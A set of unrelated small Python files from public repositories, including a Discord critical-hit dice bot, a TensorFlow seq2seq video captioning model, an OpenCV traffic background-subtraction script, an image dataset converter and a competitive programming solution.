sassafrastech/platemate | 1,159,641,176,987 | 31a6aca8c645fb8e93f86e04ca09381d809cc9e5 | db0ecb3c6a6ae58daa060a170d2d25068ff8c11c | /uploads.py | 015759bb79c4bbec8c0622c3a5ffb42b62b361cf | []
| no_license | https://github.com/sassafrastech/platemate | 85cf26dbd16eb07978c2f2be0d5d976c69b7298e | 22ae0bcaad5fed27a33122b93f41b9f1663ae6cb | refs/heads/master | 2021-08-02T15:41:59.171538 | 2021-07-22T19:28:37 | 2021-07-22T19:28:37 | 75,955,052 | 0 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | from management.run import run
from food.models import chiefs
import sys
# Example usage: "python uploads.py sandbox"
operation = sys.argv[1]
mode = sys.argv[-1]
run(
chief_module=chiefs.from_uploads,
args={'sandbox': (mode != 'real')},
operation=operation
)
| UTF-8 | Python | false | false | 273 | py | 38 | uploads.py | 30 | 0.703297 | 0.695971 | 0 | 13 | 20 | 44 |
computernerdzach/critGenBot | 16,527,034,181,855 | 728e7cb62af78519fa5bdc0da81958fd3e19b29f | eec317c5ef9b2c97bc67f3cd63bdb67430296e8d | /critGen.py | cb179d9a8b3f470b90a704c90f4ad4dfc5aa7cba | []
| no_license | https://github.com/computernerdzach/critGenBot | d4b9af1e90b412d067a84c8f208bb2859dd0fdba | 6ed3c86a8d36b6cc2f9fd22a6276bfeca60e4a5b | refs/heads/master | 2022-12-27T14:55:07.888190 | 2020-10-05T14:44:16 | 2020-10-05T14:44:16 | 286,359,246 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # bot.py
import os
import random
import discord
from dotenv import load_dotenv
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
client = discord.Client()
help_message = """***Welcome to critGenBot!***
**To roll a critical hit or miss, type '!hit' or '!MISS'**
**To keep your roll secret, include the word 'whisper' and critGenBot will DM you the result.**
**To quote Bender from Futurama, type '!quote'**
**Help menu can be accessed by typing '!help'**"""
greetings = ['Bite my shiny metal ass!',
"I'm still alive, baby!",
"Hey sexy mama. Wanna kill all humans?",
"You're using critGenBot, the bot that does not advocate the COOL crime of robbery!",
"Well, if jacking on will make strangers think I'm cool, I'll do it.",
"Of all the friends I've had, you're the first.",
"Shut up baby, I know it!"
]
byes = ["Cheese it!",
"I’m so embarrassed. I wish everybody else was dead.",
"I got ants in my butt, and I needs to strut.",
"Oh, no room for Bender, huh? Fine! I’ll go build my own lunar lander, with blackjack and hookers.",
"Game’s over, losers! I have all the money. Compare your lives to mine and then kill yourselves.",
"O’ cruel fate, to be thusly boned! Ask not for whom the bone bones—it bones for thee.",
"We’ll soon stage an attack on technology worthy of being chronicled in an anthem by Rush!",
"This is the worst kind of discrimination there is: the kind against me!",
"Anything less than immortality is a complete waste of time.",
"Hahahahaha. Oh wait you’re serious. Let me laugh even harder."
]
quotes = greetings + byes
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord!')
@client.event
async def on_message(message):
if message.author == client.user:
return
hits = ["Ludicrous Maneuver. All allies with Passive Perception 12 get +2 on next roll.",
"Late Timing. As an immediate action attack the same opponent at disadvantage.",
"Wide Open. Target incapacitated 1 round. No 1's or 2's on damage die.",
"Guarded Strike. +2AC for 1 round. No 1's or 2's on damage die.",
"Savage Chop. Ignore damage resistance. No 1's or 2's on damage die.",
"Retaliation. As an immediate action attack the same opponent. No1's or 2's on damage die.",
"Ruthless Assault. Extra damage die.",
"Defensive Strike. +4 AC for 1 round. Extra damage die.",
"Traumatic Injury. Ignore damage resistance. Extra damage die.",
"Victimized. Opponent provokes attacks of opportunity. Extra damage die.",
"Calamitous Fall. DC 13 DEX save or prone. Extra damage die.",
"Disoriented. DC 13 CON save or stunned for 1 round. Extra damage die.",
"Dirt in Eye. DC 13 WIS save or blinded for 1 round. Extra damage die.",
"Bleeder. 1d6 bleeding damage per round. Extra damage die.",
"Rout. Attacker has melee advantage and the target has disadvantage for 1round. Extra damage die.",
"The Gods Have Spoken. Roll twice and take the better result.",
"Momentum. As an immediate action attack the same opponent. Extra damagedie.",
"Great Hit. Ignore damage resistance. DoubleDamage.",
"Inspirational Display. All allies receive advantage on next roll. DoubleDamage.",
"Vertigo. Drop all items in hand. Knocked back 1d3 squares. DC 15DEX save or prone. Double Damage.",
"Perplexed Reaction. Target incapacitated 1 round,provokes attacks of opportunity. Double Damage.",
"...and Stay Down. Prone and stunned 1 round. DC 15 CON save or move halved until rest. Double Damage.",
"Astute Counter. As an immediate action attack the same opponent with advantage. DoubleDamage.",
"Impaled. 1d10 bleeding damage per round. Stunned 1 round. TripleDamage.",
"Conspiracy. The next hit landed on the foe is an automatic critical hit. Blinded 1 round. Triple Damage.",
"Demoralized. Prone. Stunned 2 rounds. TripleDamage.",
"Knockout. DC 16 CON save or unconscious. Prone. Stunned 2 rounds. Triple Damage.",
"Final Strike. DC 18 CON save or die. Prone 1d4 squares back. Stunned 3rounds. QuadrupleDamage.",
]
misses = ["Seppuku. Knocked prone. Disarmed 1d3 squares away. Stunned 2 rounds. Critical hit on self.",
"Total Failure. Knocked prone. Disarmed 1d3 squares away. Stunned 1 round. Critical hit on self.",
"Predictable Parry. Knocked prone. Disarmed. Stunned 1 round. Damage to ally (self).",
"Bloody Mess.Bleeding 1d6 per round. Disarmed. Stunned 1 round. Damage to self.",
"Gut Check. Damage to ally (self). Incapacitated for 1 round.",
"In Your Face. Damage to self. Incapacitated for 1 round.",
"Tipping the Scales. Opponent has advantage and attacker has disadvantage for 1 round.",
"Mighty Disarm. Disarmed 1d6 squares away. Disadvantage 1 round.",
"Terrible Maneuver. Nearest opponent gets a free attack with advantage as an immediate action.",
"The Bigger They Are... Knocked back 1d3 squares before falling prone. ",
"Butterfingers. Disarmed. Disadvantage on next attack roll.",
"Dropped Guard. Nearest opponent gets a free attack as an immediate action, if possible",
"Vision Impairment. Blinded 1 round.",
"Loss of Resolve. The next saving throw in combat automatically fails.",
"Partial Blow. Half damage to self.",
"Wide Open. Provoke attack of opportunity from closest melee opponent, if possible.",
"Poor Karma. The next saving throw in combat is at disadvantage.",
"Slow to Respond. No bonus action or reaction next round.",
"Tough Recovery. Go last in initiative next round.",
"Nothing unusual happens.",
]
whisper_text = f'{client.user} whispered result to {message.author}'
if '!hit' in message.content.lower():
response = random.choice(hits)
if 'whisper' in message.content.lower():
await message.author.send(response)
await message.channel.send(whisper_text)
print(f'{message.author} whispered a hit roll\n ' + response)
else:
await message.channel.send(response)
print(f'{message.author} made a hit roll\n ' + response)
elif '!miss' in message.content.lower():
response = random.choice(misses)
if 'whisper' in message.content.lower():
await message.author.send(response)
await message.channel.send(whisper_text)
print(f'{message.author} whispered a miss roll\n ' + response)
else:
await message.channel.send(response)
print(f'{message.author} made a miss roll\n ' + response)
elif '!help' in message.content.lower():
await message.channel.send(help_message)
print(f'{message.author} asked for help.')
elif '!quote' in message.content.lower():
bender_quote = random.choice(quotes)
await message.channel.send(bender_quote)
print(f'{message.author} quoted Bender.\n ' + bender_quote)
elif "!bye" in message.content.lower() or "!goodbye" in message.content.lower():
so_long = random.choice(byes)
await message.channel.send(so_long)
print(f'{message.author} dismissed critGenBot\n ' + so_long)
await client.close()
client.run(TOKEN)
| UTF-8 | Python | false | false | 7,759 | py | 2 | critGen.py | 1 | 0.642608 | 0.633828 | 0 | 130 | 58.576923 | 119 |
liulong3712/pythonstudy | 13,228,499,295,450 | fe9d92fe41477f141a00f5c9731ce4ad4261cddd | 75ee9dbfdad7760e059fd078dabc0a2efce157d4 | /pythonstudy/python/study/test/test1.py | 61df2b0f96409fc931c0577bcde15c8898b1fe51 | []
| no_license | https://github.com/liulong3712/pythonstudy | dcba1076866903bb05aec198b3f54f641106bc06 | eec9f41cab101100955853730da596878fbe94d5 | refs/heads/master | 2021-01-19T01:12:10.035778 | 2016-06-22T10:33:32 | 2016-06-22T10:33:32 | 61,365,059 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
import urllib2
#https://www.baidu.com/s?wd=%E6%B5%8B%E8%AF%95
import chardet
if __name__ == "__main__":
import urllib
url = 'http://www.baidu.com/s'
values = {'wd':'测试',
's':'123'}
data = urllib.urlencode(values) # 编码工作
print data
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
headers = { 'User-Agent' : user_agent }
req = urllib2.Request(url,data,headers) # 发送请求同时传data表单
print req.get_full_url()
response = urllib2.urlopen(req) #接受反馈的信息
the_page = response.read() #读取反馈的内容
full_url = url + '?' + data
print urllib2.urlopen(full_url).read()
#print the_page
| UTF-8 | Python | false | false | 731 | py | 26 | test1.py | 19 | 0.600297 | 0.573551 | 0 | 21 | 31 | 65 |
Sid11/Tap_Search | 13,108,240,191,655 | 907ef57bad1c2a2fc4bbd266653dfbcc449e2536 | 7c3cd244e988d29189494302f0c265e05b8c8c0d | /website/admin.py | 4f36e62fdd977fa4ce311b2afeeebab1454a984a | []
| no_license | https://github.com/Sid11/Tap_Search | 983ccc0f6e25ff9907949b34bb99fdff9483a8a6 | 56786d73b369ff023220cbcf737e3223dd9927b5 | refs/heads/master | 2022-12-09T23:22:02.559607 | 2019-12-01T15:52:55 | 2019-12-01T15:52:55 | 225,105,874 | 0 | 0 | null | false | 2022-12-08T03:14:57 | 2019-12-01T04:22:32 | 2019-12-01T15:52:58 | 2022-12-08T03:14:57 | 33,815 | 0 | 0 | 4 | Batchfile | false | false | from django.contrib import admin
from .models import Post, Image
admin.site.register([Post,Image])
# Register your models here.
| UTF-8 | Python | false | false | 128 | py | 12 | admin.py | 6 | 0.789063 | 0.789063 | 0 | 4 | 31 | 33 |
iparinile/Learning_Lutz_Learning_Python | 10,299,331,610,025 | b4e880c5d938696765fb58b9c7112b81ae3000ea | 03bd051037f1d0a7ce4fc1364f6cb3f1b75d1389 | /Day 2/files.py | 7864861ae991aad4b3069c90cf8d3a9d47cb1a88 | []
| no_license | https://github.com/iparinile/Learning_Lutz_Learning_Python | 7c698b1c788b70662e0b890afe542316a1730d4e | 2ef81d7057f2b3b657e2e1ef7311d7178273037d | refs/heads/master | 2022-11-06T21:48:15.464526 | 2020-07-20T13:05:30 | 2020-07-20T13:05:30 | 275,144,729 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | f = open('data.txt', 'w') # Создать новый файл в режиме записи ('w')
f.write('Hello\n') # Записать в него строки символов
f.write('world\n')
f.close() # Закрыть для сбрасывания буферов вывода на диск
f = open('data.txt', 'r') # 'r' (чтение) - стандартный режим обработки
text = f.read() # Прочитать все содержимое файла в строку
print(text)
# Hello
# world
print(text.split()) # Содержимое файла - всегда строка
# ['Hello', 'world']
for line in open('data.txt'):
print(line)
import struct
packed = struct.pack('>i4sh', 7, b'spam', 9) # Создание упакованных двоичных данных
print(packed) # b'\x00\x00\x00\x07spam\x00\t' # 10 байтов, не объекты и не текст
file = open('data.bin', 'wb') # Открыть двоичный файл для записи
file.write(packed) # Записать упакованные двоичные данные
file.close()
data = open('data.bin', 'rb').read() # Открыть/прочитать двоичный файл данных
print(data) # b'\x00\x00\x00\x07spam\x00\t'
print(data[4:8]) # b'spam' # Нарезать байты в середине
print(list(data)) # [0, 0, 0, 7, 115, 112, 97, 109, 0, 9] # Последовательность 8-битных байтов
print(struct.unpack('>i4sh', data)) # (7, b'spam', 9) # Снова распаковать в объекты
| UTF-8 | Python | false | false | 1,595 | py | 11 | files.py | 11 | 0.676271 | 0.635593 | 0.008475 | 27 | 42.703704 | 97 |
namitav1997/CPSC-8810-Deep-Learning | 8,521,215,126,509 | 99cf7e69a12f622588f3d26c628f1bdf96ace886 | 84fc3401826b32af7fff1c68f02bf3ea43f62e75 | /HW2/HW2_1/ncheruk_seq2seq_model.py | ec28b1c617a76c83c270fd1bb88281b5a9e3aa01 | []
| no_license | https://github.com/namitav1997/CPSC-8810-Deep-Learning | 5537354afcfa9693eeb1229627e3ec9d43ae9af8 | 225d9e8210062b66a193f2b47c75757d009699b3 | refs/heads/master | 2022-05-31T03:56:13.832055 | 2020-04-30T23:27:11 | 2020-04-30T23:27:11 | 245,570,007 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #Namita Vagdevi Cherukuru
#HW 2: Deep Learning (CPSC 8810)
#ncheruk@clemson.edu
import tensorflow as tenf
import numpy as nump
import random
class Ncheruk_Seq2Seq_Model():
def __init__(self, rnn_sz, numof_layers, dim_vft, embed_size,
lr_rate, word_2_i, mode, max_gradnorm,
atten, bsearch, bsize,
maxer_step, maxdecstep):
tenf.set_random_seed(5677)
nump.random.seed(5677)
random.seed(5677)
self.word_2_idx = word_2_i
self.mode = mode
self.max_gradient_norm = max_gradnorm
self.max_decoder_steps = maxdecstep
self.rnn_size = rnn_sz
self.num_layers = numof_layers
self.dim_video_feat = dim_vft
self.embedding_size = embed_size
self.learning_rate = lr_rate
self.use_attention = atten
self.beam_search = bsearch
self.beam_size = bsize
self.max_encoder_steps = maxer_step
self.vocab_size = len(self.word_2_idx)
self.building_model()
def crte_rnn_cell(self):
def sgle_rnn_cell():
single_cell = tenf.contrib.rnn.GRUCell(self.rnn_size)
cell = tenf.contrib.rnn.DropoutWrapper(single_cell, output_keep_prob=self.prob_placeholder, seed=9487)
return cell
cell = tenf.contrib.rnn.MultiRNNCell([sgle_rnn_cell() for _ in range(self.num_layers)])
return cell
def building_model(self):
tenf.set_random_seed(5677)
nump.random.seed(5677)
random.seed(5677)
self.encdr_inputs = tenf.placeholder(tenf.float32, [None, None, None], name='encoder_inputs')
self.encdr_inp_length = tenf.placeholder(tenf.int32, [None], name='encoder_inputs_length')
self.batch_sz = tenf.placeholder(tenf.int32, [], name='batch_size')
self.prob_placeholder = tenf.placeholder(tenf.float32, name='keep_prob_placeholder')
self.dec_targets = tenf.placeholder(tenf.int32, [None, None], name='decoder_targets')
self.der_target_len = tenf.placeholder(tenf.int32, [None], name='decoder_targets_length')
self.max_sequence_length = tenf.reduce_max(self.der_target_len, name='max_target_len')
self.mask = tenf.sequence_mask(self.der_target_len, self.max_sequence_length, dtype=tenf.float32,
name='masks')
with tenf.variable_scope('decoder', reuse=tenf.AUTO_REUSE):
encoder_inputs_length = self.encdr_inp_length
if self.beam_search:
print("Using beamsearch decoding...")
encoder_outputs = tenf.contrib.seq2seq.tile_batch(encoder_outputs, multiplier=self.beam_size)
encoder_state = tenf.contrib.framework.nest.map_structure(
lambda s: tenf.contrib.seq2seq.tile_batch(s, self.beam_size), encoder_state)
encoder_inputs_length = tenf.contrib.seq2seq.tile_batch(self.encdr_inp_length,
multiplier=self.beam_size)
batch_size = self.batch_sz if not self.beam_search else self.batch_sz * self.beam_size
projection_layer = tenf.layers.Dense(units=self.vocab_size,
kernel_initializer=tenf.truncated_normal_initializer(mean=0.0, stddev=0.1,
seed=9487))
embedding_decoder = tenf.Variable(tenf.random_uniform([self.vocab_size, self.rnn_size], -0.1, 0.1, seed=9487),
name='embedding_decoder')
decoder_cell = self.crte_rnn_cell()
if self.use_attention:
attention_mechanism = tenf.contrib.seq2seq.BahdanauAttention(
num_units=self.rnn_size,
memory=encoder_outputs,
normalize=True,
memory_sequence_length=encoder_inputs_length)
decoder_cell = tenf.contrib.seq2seq.AttentionWrapper(
cell=decoder_cell,
attention_mechanism=attention_mechanism,
attention_layer_size=self.rnn_size,
name='Attention_Wrapper')
decoder_initial_state = decoder_cell.zero_state(batch_size=batch_size, dtype=tenf.float32).clone(
cell_state=encoder_state)
else:
decoder_initial_state = encoder_state
output_layer = tenf.layers.Dense(self.vocab_size,
kernel_initializer=tenf.truncated_normal_initializer(mean=0.0, stddev=0.1,
seed=9487))
ending = tenf.strided_slice(self.dec_targets, [0, 0], [self.batch_sz, -1], [1, 1])
decoder_inputs = tenf.concat([tenf.fill([self.batch_sz, 1], self.word_2_idx['<bos>']), ending], 1)
start_tokens = tenf.ones([self.batch_sz, ], tenf.int32) * self.word_2_idx['<bos>']
end_token = self.word_2_idx['<eos>']
if self.beam_search:
inference_decoder = tenf.contrib.seq2seq.BeamSearchDecoder(
cell=decoder_cell,
embedding=embedding_decoder,
start_tokens=start_tokens,
end_token=end_token,
initial_state=decoder_initial_state,
beam_width=self.beam_size,
output_layer=output_layer)
else:
inference_decoding_helper = tenf.contrib.seq2seq.GreedyEmbeddingHelper(
embedding=embedding_decoder,
start_tokens=start_tokens,
end_token=end_token)
inference_decoder = tenf.contrib.seq2seq.BasicDecoder(
cell=decoder_cell,
helper=inference_decoding_helper,
initial_state=decoder_initial_state,
output_layer=output_layer)
inference_decoder_outputs, _, _ = tenf.contrib.seq2seq.dynamic_decode(
decoder=inference_decoder,
maximum_iterations=self.max_decoder_steps)
if self.beam_search:
self.decoder_predict_decode = inference_decoder_outputs.predicted_ids
self.decoder_predict_logits = inference_decoder_outputs.beam_search_decoder_output
else:
self.decoder_predict_decode = tenf.expand_dims(inference_decoder_outputs.sample_id, -1)
self.decoder_predict_logits = inference_decoder_outputs.rnn_output
with tenf.variable_scope('encoder', reuse=tenf.AUTO_REUSE):
enr_inputs_flatten = tenf.reshape(self.encdr_inputs, [-1, self.dim_video_feat])
enr_inputs_embed = tenf.layers.dense(enr_inputs_flatten, self.embedding_size, use_bias=True)
enr_inputs_embed = tenf.reshape(enr_inputs_embed,
[self.batch_sz, self.max_encoder_steps, self.rnn_size])
encoder_cell = self.crte_rnn_cell()
encoder_outputs, encoder_state = tenf.nn.dynamic_rnn(
encoder_cell, enr_inputs_embed,
sequence_length=self.encdr_inp_length,
dtype=tenf.float32)
self.saver = tenf.train.Saver(tenf.global_variables(), max_to_keep=50)
decoder_inputs_embedded = tenf.nn.embedding_lookup(embedding_decoder, decoder_inputs)
training_helper = tenf.contrib.seq2seq.TrainingHelper(
inputs=decoder_inputs_embedded,
sequence_length=self.der_target_len,
time_major=False, name='training_helper')
training_decoder = tenf.contrib.seq2seq.BasicDecoder(
cell=decoder_cell, helper=training_helper,
initial_state=decoder_initial_state,
output_layer=output_layer)
decoder_outputs, _, _ = tenf.contrib.seq2seq.dynamic_decode(
decoder=training_decoder,
impute_finished=True,
maximum_iterations=self.max_sequence_length)
self.decoder_logits_train = tenf.identity(decoder_outputs.rnn_output)
self.decoder_predict_train = tenf.argmax(self.decoder_logits_train, axis=-1, name='decoder_pred_train')
self.loss = tenf.contrib.seq2seq.sequence_loss(
logits=self.decoder_logits_train,
targets=self.dec_targets,
weights=self.mask)
tenf.summary.scalar('loss', self.loss)
self.summary_op = tenf.summary.merge_all()
optimizer = tenf.train.AdamOptimizer(self.learning_rate)
trainable_params = tenf.trainable_variables()
gradients = tenf.gradients(self.loss, trainable_params)
clip_gradients, _ = tenf.clip_by_global_norm(gradients, self.max_gradient_norm)
self.train_op = optimizer.apply_gradients(zip(clip_gradients, trainable_params))
def train(self, sess, encoder_inputs, encoder_inputs_length, decoder_targets, decoder_targets_length):
feed_dict = {self.encdr_inputs: encoder_inputs,
self.encdr_inp_length: encoder_inputs_length,
self.dec_targets: decoder_targets,
self.der_target_len: decoder_targets_length,
self.prob_placeholder: 0.8,
self.batch_sz: len(encoder_inputs)}
_, loss, summary = sess.run([self.train_op, self.loss, self.summary_op], feed_dict=feed_dict)
return loss, summary
def infer(self, sess, encoder_inputs, encoder_inputs_length):
feed_dict = {self.encdr_inputs: encoder_inputs,
self.encdr_inp_length: encoder_inputs_length,
self.prob_placeholder: 1.0,
self.batch_sz: len(encoder_inputs)}
predict, logits = sess.run([self.decoder_predict_decode, self.decoder_predict_logits], feed_dict=feed_dict)
return predict, logits
def eval(self, sess, encoder_inputs, encoder_inputs_length, decoder_targets, decoder_targets_length):
feed_dict = {self.encdr_inputs: encoder_inputs,
self.encdr_inp_length: encoder_inputs_length,
self.dec_targets: decoder_targets,
self.der_target_len: decoder_targets_length,
self.prob_placeholder: 1.0,
self.batch_sz: len(encoder_inputs)}
loss, summary = sess.run([self.loss, self.summary_op], feed_dict=feed_dict)
return loss, summary
| UTF-8 | Python | false | false | 10,964 | py | 8 | ncheruk_seq2seq_model.py | 5 | 0.568862 | 0.558282 | 0 | 230 | 45.66087 | 123 |
rs3603/Traffic-Intersection-Research | 4,947,802,368,118 | 450313b1ce263bbdd9669615c6930cb84fb24c79 | f07601785f6c8c8b9abcef9d521dddfb4a347fcb | /trial_backsub1.py | b6a25d99069661ab916e8a753e93fc2d144cae76 | []
| no_license | https://github.com/rs3603/Traffic-Intersection-Research | 0f929fe4d2134648ebdd2a4c194f9df1f9d8bdd5 | 493e78297e49e1b8112b5356efda3250e3ee10ab | refs/heads/master | 2021-01-12T02:36:17.545410 | 2017-01-05T03:24:40 | 2017-01-05T03:24:40 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import cv2
#cap = cv2.VideoCapture(1)
cap = cv2.VideoCapture('rec_out.wmv')
#kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))
fgbg = cv2.createBackgroundSubtractorMOG2(history=50000, varThreshold = 1)
ret, framebg = cap.read()
framebg = (cv2.cvtColor(framebg, cv2.COLOR_BGR2GRAY))
'''
ret, framebg1 = cap.read()
framebg1 = cv2.equalizeHist(cv2.cvtColor(framebg1, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
ret, framebg2 = cap.read()
framebg = (cv2.cvtColor(framebg2, cv2.COLOR_BGR2GRAY))
'''
while(1):
ret, frame = cap.read()
cap.set(cv2.CAP_PROP_FPS,200)
img_gray = (cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY))
#print img_yuv
# equalize the histogram of the Y channel
#img_yuv[:,:,0] = cv2.equalizeHist(img_yuv[:,:,0])
# convert the YUV image back to RGB format
#frame = cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)
fgmask = abs(img_gray-framebg)%255
#indices = fgmask > 0
#fgmask[indices] = 255
#print fgmask.astype(dtype='uint8')
se = np.ones((7,7), dtype='uint8')
kernel = np.ones((7,7),np.uint8)
fgmask = cv2.morphologyEx(fgmask.astype(dtype = 'uint8'), cv2.MORPH_OPEN, se)
im2, contours, hierarchy = cv2.findContours(fgmask.astype(dtype = 'uint8'),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
indices = fgmask>200
fgmask[indices] = 0
thresh = cv2.threshold(fgmask, 5, 255, cv2.THRESH_BINARY)[1]
threshnew = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, se)
im2, contours, hierarchy = cv2.findContours(threshnew,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
for c in contours:
rect = cv2.boundingRect(c)
if cv2.contourArea(c)>300:
#print cv2.contourArea(c)
x,y,w,h = rect
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)
#cv2.putText(frame,'Car',(x+w+10,y+h),0,0.3,(0,255,0))
if cv2.contourArea(c)>5 and cv2.contourArea(c)<70 and rect[2]>5 and rect[3]>5:
#print cv2.contourArea(c)
x,y,w,h = rect
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
#cv2.putText(frame,'Pedestrian',(x+w+10,y+h),0,0.3,(0,0,255))
cv2.imshow("Show",frame)
#print len(contours)
#cv2.drawContours(fgmask, contours, 3, (0,255,0), 3)
se = np.ones((7,7), dtype='uint8')
#cv2.imshow('frame',fgmask)
#cv2.imshow('frame1',im2)
k = cv2.waitKey(20) & 0xff
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
| UTF-8 | Python | false | false | 3,173 | py | 6 | trial_backsub1.py | 5 | 0.639458 | 0.576741 | 0 | 81 | 37.17284 | 121 |
rymoah/CoInGP | 9,483,287,834,114 | a910694c7f4e0c94b8a6c223a70b9f37d2179be4 | 24ac5fe4c900e3279a1f602f34056ec50d4881c0 | /src/img_convert_moore.py | 1900d28230769dbcf4a69ade8ae8b63e8d0109fd | [
"MIT"
]
| permissive | https://github.com/rymoah/CoInGP | c5be2eb92ecb65a31f01fb1f9efdbbe00cf171d6 | d9906f7d21211d11e23e085734f7e71aab7d59ee | refs/heads/main | 2023-04-08T04:14:05.600481 | 2021-04-25T10:44:51 | 2021-04-25T10:44:51 | 357,918,237 | 1 | 0 | null | false | 2021-04-25T10:44:52 | 2021-04-14T13:38:26 | 2021-04-25T10:41:29 | 2021-04-25T10:44:51 | 91 | 0 | 0 | 0 | C++ | false | false | from PIL import Image
import random
import math
import sys
N_PIXELS = 100
IMAGE = sys.argv[1]
def window(img, x, y, radius):
inputs = []
outputs = None
for i in range(x - radius, x + radius + 1):
for j in range(y - radius, y + radius + 1):
if i != x or j != y:
inputs.append(img.getpixel((i, j))[0])
else:
outputs = img.getpixel((i, j))[0]
return inputs, outputs
def slide_window(img, radius, test):
cases = []
for x in range(radius, img.width - radius):
for y in range(radius, img.height - radius):
overlap = [(i, j) for i in range(x-radius, x+radius+1)
for j in range(y-radius, y+radius+1) if (i, j) in tests]
if overlap == []:
cases.append(window(img, x, y, radius))
return cases
def make_test(img, radius):
tests = []
random.seed(a=0)
for x in range(radius, img.width - radius, radius + 1):
ys = random.sample(range(radius, img.height - radius, radius + 1),
N_PIXELS)
for y in ys:
tests.append((x, y))
return tests
im = Image.open(IMAGE).convert('LA')
im2 = Image.open(IMAGE).convert('LA')
radius = 1
tests = make_test(im, radius)
for point in tests:
im.putpixel(point, (0, 255))
im.save('greyscale.png')
train = slide_window(im, 1, tests)
f = open("train.txt", "w")
for case in train:
for i in case[0]:
f.write(f"{i} ")
f.write(f"{case[1]}\n")
f.close()
f = open("test.txt", "w")
test_values = []
for x, y in tests:
a, b = window(im2, x, y, radius)
for i in a:
f.write(f"{i} ")
f.write(f"{b}\n")
f.close()
f = open("points.txt", "w")
for x, y in tests:
f.write(f"{x} {y}\n")
f.close()
f = open("baselines.txt", "w")
error = 0
for case in train:
prediction = sum(case[0])//len(case[0])
error += (prediction - case[1])**2
rmse = math.sqrt(error/len(train))
f.write(f"{rmse}\n")
error = 0
for x, y in tests:
a, b = window(im2, x, y, radius)
prediction = sum(a)//len(a)
error += (prediction - b)**2
im.putpixel((x, y), (prediction, 255))
rmse = math.sqrt(error/len(tests))
f.write(f"{rmse}\n")
f.close()
im.save("baseline.png")
| UTF-8 | Python | false | false | 2,247 | py | 13 | img_convert_moore.py | 10 | 0.552737 | 0.537606 | 0 | 92 | 23.423913 | 79 |
NicolasSimard/BlitzChat | 9,861,244,919,642 | d1f465c6bcd607215c351c6e17831f186de3ac63 | c4c2ad7cad2dd9510602b3d1e0ad6da4339e1469 | /youtube/livebroadcast.py | 349d20600639f2a79344f19a705ce96d81bd9f86 | []
| no_license | https://github.com/NicolasSimard/BlitzChat | 3e3d4b1c1ac5ed12082a43f04597bde42e0ebedc | c872c84927dc8df3b4bec119ef16f5af16fe4af5 | refs/heads/master | 2021-09-09T00:17:25.053332 | 2018-03-12T20:35:18 | 2018-03-12T20:35:18 | 116,960,842 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class LiveBroadcast:
""" A LiveBroadcast object represents a Youtube live broadcast. It corresponds to a Youtube liveBroadcast ressource (see https://developers.google.com/youtube/v3/live/docs/liveBroadcasts#resource)
Attributes:
client: An authenticated youtube service.
id: The live boradcast's id.
title: The title of the live broadcast.
published_at: Time at which the livebroadcast was published.
livechat_id: The id if the associated live chat.
Methods:
get_livechat: Returns the associated LiveChat object
"""
def __init__(self, ressource):
""" Initialize the live broadcast from
a Youtube liveBroadcast ressource.
"""
self.ressource = ressource
@property
def id(self):
return self.ressource['id']
@property
def name(self):
""" Return the name of the live broadcast. """
return self.title
@property
def title(self):
""" Return the title of the live broadcast. """
return self.ressource['snippet']['title']
@property
def published_at(self):
""" Return the moment at which the live broadcast started. """
return self.ressource['snippet']['publishedAt']
@property
def livechat_id(self):
return self.ressource['snippet'].get('liveChatId', None)
def __repr__(self):
return self.ressource
def __str__(self):
return "Live broadcast {}.".format(self.title) | UTF-8 | Python | false | false | 1,498 | py | 17 | livebroadcast.py | 14 | 0.637517 | 0.636849 | 0 | 52 | 27.826923 | 200 |
fluffyowl/past-submissions | 10,522,669,878,399 | e1121a30aa0abd72156f84bf22c760e6e9a8b267 | 048df2b4dc5ad153a36afad33831017800b9b9c7 | /atcoder/agc003/agc003_b.py | 8fcb08584d7cb37a29913fdc1da9c00073e9861b | []
| no_license | https://github.com/fluffyowl/past-submissions | a73e8f5157c647634668c200cd977f4428c6ac7d | 24706da1f79e5595b2f9f2583c736135ea055eb7 | refs/heads/master | 2022-02-21T06:32:43.156817 | 2019-09-16T00:17:50 | 2019-09-16T00:17:50 | 71,639,325 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | N = input()
cards = [int(raw_input()) for i in xrange(N)]
ans = cards[0] / 2
cards[0] %= 2
for i in xrange(1, N):
if cards[i] != 0 and cards[i-1] != 0:
cards[i] -= 1
ans += 1
ans += cards[i]/2
cards[i] %= 2
print ans
